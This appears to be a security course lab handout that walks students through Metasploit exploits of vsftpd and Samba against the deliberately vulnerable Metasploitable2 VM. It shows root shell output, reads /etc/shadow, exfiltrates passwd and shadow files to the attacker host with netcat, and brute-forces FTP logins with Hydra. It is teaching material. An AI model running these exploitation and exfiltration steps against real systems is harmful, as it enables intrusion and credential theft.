Lab 5 - Exploitation (Metasploit)

Metasploit is an open source platform for vulnerability research, exploit development, and the creation of custom security tools. In this lab, we're going to be using Metasploit to attack the Metasploitable2 VM.

Activities

Part 1 - Getting Started

Update Kali:

$ sudo apt update
$ sudo apt upgrade

Start the Kali PostgreSQL service (which Metasploit uses as its backend):

$ sudo systemctl start postgresql
# (Will launch the service postgresql@14-main and then exit...)

Initialise the Metasploit PostgreSQL Database:

$ sudo msfdb init    # Only do this ONCE, not every time!

Launch msfconsole in Kali:

$ msfconsole

Verify database connectivity

msf6> db_status
# Should see:
# [*] Connected to msf. Connection type: postgresql.

Add a new workspace for this lab. A workspace allows you to label data collected (hosts, vulnerabilities, ....) for a specific project in the database

See Also: Managing Workspaces

msf6> workspace -a 178-metasploitable2

(Tip: If you need to select this workspace later, type workspace 178-metasploitable2)

Review the currently configured workspaces. A * marks the currently selected workspace.

msf6> workspace

Run nmap over the subnet where you know the metasploitable2 VM is running. The db_nmap command will save the results of the nmap scan to the database. Use a -A (ALL THE THINGS!) scan here because we know there are only a few systems in this subnet (metasploitable2, Kali, perhaps your host OS if you're using VMware) and thus it won't take too long

msf6> db_nmap -A xxx.xxxx.xxx.0/24     ### e.g. 172.16.196.0/24

View the list of hosts found in the nmap scan:

msf6> hosts
# Verify that the IP address of your Metasploitable2 VM is listed here

View the list of services found in the nmap scan:

msf6> services

Deliverables:

  • There are two FTP servers running on Metasploitable. What are they? For your answer, provide the text in the "info" column of the "services" report, and include the version numbers)

Part 2 - Exploiting VSFTPD

Let's go exploit vsftpd! And learn about Metasploit searching in the process.

First, learn about how search works in Metasploit.

msf6> help search

Then, search for the first target FTP application - VSFTPD

msf6> search type:exploit name:vsftpd

Deliverables:

  • How many exploits were found?
  • What is the full path & name of the exploit? (starting with exploit/...)

Select the exploit you found

msf6> use exploit/unix/.....   # (Provide the full path to exploit here)

Briefly review the information that Metasploit has on this particular exploit

msf6> info

From the exploit information, there is a link to a pastebin.com URL that provides a code diff showing the malicious backdoor that was added to the server. Feel free to review the code, it's a very simple backdoor. If the FTP username is a :) smiley face, a TCP callback shell is launched.

See Also: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

Deliverables:

  • What is the pastebin.com URL with the code diff?

For the same exploit, briefly review the options that are available (i.e. might need to be correctly configured).

msf6> show options

Deliverables:

  • What are the names of the two options that need to be set? Think of these as environment variables. The "R" stands for "Remote". Answer in the order listed in Metasploitable.

Both of these options must be set for the exploit to target the correct host. Set them now with the information you previously learned about the Metasploitable2 VM:

msf6> set RHOSTS aaa.bbb.ccc.ddd   # Must set remost host (IP address of Metasploitable2 VM)
msf6> set RPORT XXXX     # Must set remote port

Now it's time to RUN THE EXPLOIT!

msf6> exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 172.16.196.174:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.196.174:21 - USER: 331 Please specify the password.
[+] 172.16.196.174:21 - Backdoor service has been spawned, handling...
[+] 172.16.196.174:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.196.173:45195 -> 172.16.196.174:6200) at 2020-02-12 12:20:15 -0800

Although you won't see a command prompt, you now have one. Try typing Linux commands at the console.

Deliverables:

  • Using the whoami command, what user are you running as via the exploit?
  • Using the uname -a command, what is the version of the Linux kernel running on the Metasploitable2 VM? Provide the full string.

Finally, obtain the hashed forms of the user passwords on the system for future analysis. On Linux systems, these are stored in the "shadow" file. Use this command to look at the /etc/shadow file and only show lines where an account password has been set. (The others are non-login accounts, i.e. local-only)

cat /etc/shadow | grep '$1' 

Deliverables:

  • What are the hashed ("shadow") forms of the user passwords on the system?

After answering this question, feel free to explore the shell, and then CTRL-C to terminate this session and return to Metasploit.

If you want to leave this particular exploit, use the back command

msf6> back

Part 3 - Exploiting Samba

Samba is an open source implementation of Microsoft file and printer sharing protocols, as well as Active Directory.

First, check the version of Samba that is running (shown in the earlier Nmap scan results). Then, look for exploits in Samba for that version.

msf6> search type:exploit name:samba

Deliverables:

  • What version of Samba is running on the Metasploitable2 VM? (Give the full "info" string from the earlier nmap scan)
  • How many exploits in Samba (not "Sambar") does Metasploit currently have? (Note that the labels begin at zero...)

At first glance, checking for version numbers isn't particularly helpful here. The description either doesn't include applicable version numbers or the versions listed are older than what we're targeting. There aren't that many - maybe we try them all? Or just the ones with a rank of excellent and great? (Or just Google to find out which one Metasploitable2 is susceptible to?)

msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> options
msf6> set RHOSTS aaa.bbb.ccc.ddd   # Must set remote host (IP address of Metasploitable2 VM)
msf6> set LHOST www.xxx.yyy.zzz    # Must set local host (IP address of Kali VM)
msf6> exploit
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 172.16.196.2:4444 
[*] Command shell session 2 opened (172.16.196.2:4444 -> 172.16.196.4:56315) at 2021-01-20 15:21:59 -0800

Although you won't see a command prompt, you now have one. Try typing Linux commands at the console, such as whoami.

Deliverables:

  • What CVE number was this particular vulnerability in Samba assigned?
  • What versions of Samba were susceptible to this vulnerability?
  • After using the Samba exploit, what command could you use to confirm the specific version of Samba that is running on the Metasploitable2 VM? Google will help you with a simple command to run on the remote host to obtain this information.

Now that you have access to the Metasploitable2 system via another exploit, let's try another way to get access to the /etc/passwd and /etc/shadow files on the system - exfiltrating them via Netcat instead of manual copy and paste. This method can also be used to exfiltrate arbitrary files.

See also: Basic methods for data exfiltration

Create a new teminal tab. You should now have two termainal tabs:

  • Tab 1: Kali running Metasploit running the exploit with shell access to the target system
  • Tab 2: Kali at a regular (not msf6) command prompt

On Tab 2 (the Kali regular command prompt), run the Netcat utility, listening, on port 4567

# Run on Tab 2!
# Listening to receive data...
$ nc -l -p 4567 > passwd.txt
# Netcat will wait and receive data into the file for FOREVER

On Tab 1 (the exploit tab with shell access giving you control of the target), pipe the contents of the /etc/passwd file to the Netcat utility, which is set to connect to Kali at the IP and port specified:

# Run on Tab 1!
# Sending data...
cat /etc/passwd | nc xxx.xxx.xxx.xxx 4567
# Update command with the IP address of your Kali VM

There will be no progress bar or other sign of activity. However, you already know the file is small, so it should transfer quickly. No need to wait for it. Go back to the "listening" netcat, kill it with a CTRL-C and inspect the contents of the passwd.txt file using the cat utility. Does it have the data you were expecting? If so, good! If not, re-check your commands and try again until you've exfiltrated the passwd file.

Modify and repeat those two commands to exfiltrate the /etc/shadow file as well.

In this particular instance, it is more helpful to combine the passwd and shadow files together into a single file for future password-cracking (next lab!). Use the unshadow command on the Kali host to merge those two files together, and save it for later.

$ unshadow passwd.txt shadow.txt > metasploitable_logins.txt

Feel free to explore the exploit shell, and then CTRL-C to terminate this session and return to Metasploit.

Deliverables:

  • What is the contents of the merged metasploitable_logins.txt file?

Part 4 - Hydra

Hydra is a brute force parallelized login cracker which supports numerous protocols to attack via online attacks, including: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Use Hydra to do online password guessing against a single username in Metasploitable2. How do we know this usernames? Multiple ways: From accounts on other systems, from email addresses, from likely combinations of human names, or just by guessing (root, admin, Administrator, user, etc...)

Run xhydra (the GUI version of the command-line hydra) with the following settings:

  • Crack the service username,
  • over ftp (file transfer protocol),
  • with 4 concurrent tasks (a.k.a. threads) to avoid swamping the server and having it drop requests,
  • and using the basic password file from John the Ripper at /usr/share/john/password.lst

Deliverables:

  • What is the command-line invocation that the GUI built from setting those specified options? It's shown at the bottom of the window.
  • How long did it take Hydra to find this password?
  • What was the password for that account?

Part 5 - Exploiting Something Else

It's time for you to explore Metasploit!

Using Metasploit and your Google skills, discover another exploit that works on the Metasploitable2 VM. There are many described online in blogs and tutorials, or you could use the list of services and search functionality to pull out a vulnerability without external knowledge.

Deliverables:

  • What service is the vulnerability in?
  • What is the full name (exploit/...) of the vulnerability in Metasploitable?
  • What options does the exploit need to function?
  • How does the vulnerability/exploit work?